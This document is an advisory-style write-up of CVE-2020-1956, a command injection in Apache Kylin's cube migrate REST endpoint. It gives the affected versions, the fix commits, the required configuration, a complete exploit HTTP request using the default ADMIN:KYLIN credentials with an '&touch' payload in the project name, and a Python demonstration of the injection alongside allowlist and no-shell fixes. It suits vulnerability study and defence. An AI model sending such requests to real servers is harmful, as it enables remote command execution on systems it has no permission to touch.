(CVE-2020-1956) Apache Kylin remote command execution vulnerability
==============================================

2.17 KB / 2021-07-15 19:48:02
    
I. Vulnerability overview
------------
    
II. Affected versions
------------

- Kylin 2.3.0 - 2.3.2
- Kylin 2.4.0 - 2.4.1
- Kylin 2.5.0 - 2.5.2
- Kylin 2.6.0 - 2.6.5
- Kylin 3.0.0-alpha, 3.0.0-alpha2, 3.0.0-beta, 3.0.0
- Kylin 3.0.1
    
III. Reproduction
------------

### Vulnerability analysis

Two commits carry the fix:

[KYLIN-4426 Refine
CliCommandExecutor](https://github.com/apache/kylin/commit/9cc3793ab2f2f0053c467a9b3f38cb7791cd436a)

[KYLIN-4426
CliCommandExecutor](https://github.com/apache/kylin/commit/335d61b62517006d7e7b55638bb6fd305dffbea1?diff=split)

The code the patch touches points straight at the command-execution sink: **CubeService** is where the OS command is assembled and run, and the fix adds **CliCommandExecutor.checkParameterWhiteList**, which validates the user-supplied parameters before they are spliced into the command string.

Working back from [CubeController](https://github.com/apache/kylin/blob/master/server-base/src/main/java/org/apache/kylin/rest/controller/CubeController.java) gives the REST route that reaches this sink.

Several configuration values are checked before the command-execution path is reached, so these settings must be present in `kylin.properties` (the src-config path points at the local Kylin install):

    kylin.tool.auto-migrate-cube.enabled=true
    kylin.tool.auto-migrate-cube.src-config=/home/admin/apache-kylin-3.0.1-bin-hbase1x
    kylin.tool.auto-migrate-cube.dest-config=/tmp/kylin.properties
    
### Reproduction

        POST /kylin/api/cubes/kylin_sales_cube/aaa&touch%20l1nk31&/migrate HTTP/1.1
        Host: www.0-sec.org:7070
        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:76.0) Gecko/20100101 Firefox/76.0
        Accept: application/json, text/plain, */*
        Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
        Accept-Encoding: gzip, deflate
        Cache-Control: no-cache
        Pragma: no-cache
        Authorization: Basic QURNSU46S1lMSU4=
        Connection: close
        Referer: http://127.0.0.1:7070/kylin/admin
        Cookie: project=null; JSESSIONID=2B1DC2A8566558EFF0E6BD91E5BD630E; _ga=GA1.1.636880978.1585905453; rdt_uuid=22a7eaa3-24d1-441a-b4fd-2f87dfe0197f; _fbp=fb.3.1585905456831.913087212
        Content-Type: application/x-www-form-urlencoded
        Content-Length: 11
    
        project=aaa
    
The `Authorization` header decodes to `ADMIN:KYLIN`, Kylin's default admin account, so the request needs valid credentials. The project path segment `aaa&touch%20l1nk31&` decodes to `aaa&touch l1nk31&`; it is spliced into the migrate command string as the project name, and when that string is run through a shell the `&` terminates the Kylin command and `touch l1nk31` runs as a separate command on the server. The `l1nk31` file appears in the working directory of the Kylin process.
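The analysis above names the sink (a command string built from request parameters and run through a shell) and the fix (a parameter allowlist in `CliCommandExecutor`), and the request shows the payload. The following Python is an added example, not Kylin's code: it rebuilds that shape, shows how a POSIX shell tokenises the injected project name, runs the vulnerable string under `/bin/sh -c` in a throwaway directory to prove the `touch` executes, and contrasts an allowlist check with a no-shell argument vector. `CMD_TEMPLATE`, `PARAM_WHITELIST` and every function name are this example's own assumptions and only imitate the shape of Kylin's migrate command; they are not copied from the project.

```python
"""Added example, not Apache Kylin's code: the command-injection shape behind
CVE-2020-1956 and two ways to close it (parameter allowlist, or no shell).

Assumptions: CMD_TEMPLATE only imitates the shape of the migrate command
(kylin.sh + CubeMigrationCLI with positional arguments); the template, the
allowlist regex and all names below are this example's own, not Kylin's.
"""
import os
import re
import shlex
import subprocess
import tempfile
import time

SHELL_AVAILABLE = os.path.exists("/bin/sh")

# Assumed allowlist for cube/project names: letters, digits, '_', '-', '.'.
PARAM_WHITELIST = re.compile(r"^[A-Za-z0-9_.-]+$")

# Assumed template: positional arguments spliced into one shell string.
CMD_TEMPLATE = ("{home}/bin/kylin.sh org.apache.kylin.tool.CubeMigrationCLI "
                "{src} {dst} {cube} {project}")

# The project path segment from the request on this page, URL-decoded.
PAYLOAD_PROJECT = "aaa&touch l1nk31&"


class IllegalParameterError(ValueError):
    """A user-supplied parameter contains characters outside the allowlist."""


def check_parameter_whitelist(param):
    """Allowlist check in the spirit of the KYLIN-4426 fix: shell metacharacters
    and whitespace fall outside PARAM_WHITELIST, so the value is rejected
    before it can reach the command string."""
    if not PARAM_WHITELIST.match(param):
        raise IllegalParameterError("illegal characters in parameter: %r" % param)
    return param


def is_safe_parameter(param):
    try:
        check_parameter_whitelist(param)
        return True
    except IllegalParameterError:
        return False


def build_cmd_vulnerable(home, src, dst, cube, project):
    """Pre-fix shape: user input formatted into a string that is later run
    via `/bin/sh -c`, so `&` inside `project` becomes shell syntax."""
    return CMD_TEMPLATE.format(home=home, src=src, dst=dst, cube=cube, project=project)


def build_cmd_checked(home, src, dst, cube, project):
    """Post-fix shape: validate each user-controlled parameter first."""
    return build_cmd_vulnerable(home, src, dst, check_parameter_whitelist(cube),
                                check_parameter_whitelist(project))


def injected_commands(cmd):
    """Tokenise `cmd` like a POSIX shell (punctuation_chars makes `&`, `;`, `|`
    separate tokens) and split at those operators, returning the simple
    commands the shell would run, without executing anything."""
    cmds, cur = [], []
    for tok in shlex.shlex(cmd, punctuation_chars=True):
        if tok in ("&", ";", "|", "&&", "||"):
            if cur:
                cmds.append(cur)
            cur = []
        else:
            cur.append(tok)
    if cur:
        cmds.append(cur)
    return cmds


def run_vulnerable_in_sandbox():
    """Run the vulnerable string under `/bin/sh -c` in a temp dir with a stub
    kylin.sh; report whether the injected `touch l1nk31` created its file.
    Returns False where /bin/sh is absent."""
    if not SHELL_AVAILABLE:
        return False
    with tempfile.TemporaryDirectory() as home:
        os.mkdir(os.path.join(home, "bin"))
        stub = os.path.join(home, "bin", "kylin.sh")
        with open(stub, "w") as f:
            f.write("#!/bin/sh\nexit 0\n")  # stand-in that ignores its arguments
        os.chmod(stub, 0o755)
        cmd = build_cmd_vulnerable(home, "src.properties", "dst.properties",
                                   "kylin_sales_cube", PAYLOAD_PROJECT)
        subprocess.run(["/bin/sh", "-c", cmd], cwd=home, capture_output=True)
        # `&` backgrounds both halves, so the shell may return before `touch`
        # has run: poll briefly for the marker file.
        marker = os.path.join(home, "l1nk31")
        for _ in range(50):
            if os.path.exists(marker):
                return True
            time.sleep(0.02)
        return False


def argv_form(home, src, dst, cube, project):
    """No-shell alternative: one argument vector for ProcessBuilder/subprocess,
    where `project` stays a single literal argument whatever it contains."""
    return [os.path.join(home, "bin", "kylin.sh"),
            "org.apache.kylin.tool.CubeMigrationCLI", src, dst, cube, project]


if __name__ == "__main__":
    cmd = build_cmd_vulnerable("/opt/kylin", "src.properties", "dst.properties",
                               "kylin_sales_cube", PAYLOAD_PROJECT)
    print(injected_commands(cmd))  # second command is ['touch', 'l1nk31']
    print("file created by injection:", run_vulnerable_in_sandbox())
    print("payload passes allowlist:", is_safe_parameter(PAYLOAD_PROJECT))
```

Kylin's fix kept the shell launch and added the allowlist, which `build_cmd_checked` mirrors; `argv_form` shows the structural alternative, where the project name is one argv entry and never parsed by a shell at all. Both are worth having: the allowlist also blocks values that would be harmless to the shell but wrong for `CubeMigrationCLI`.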
    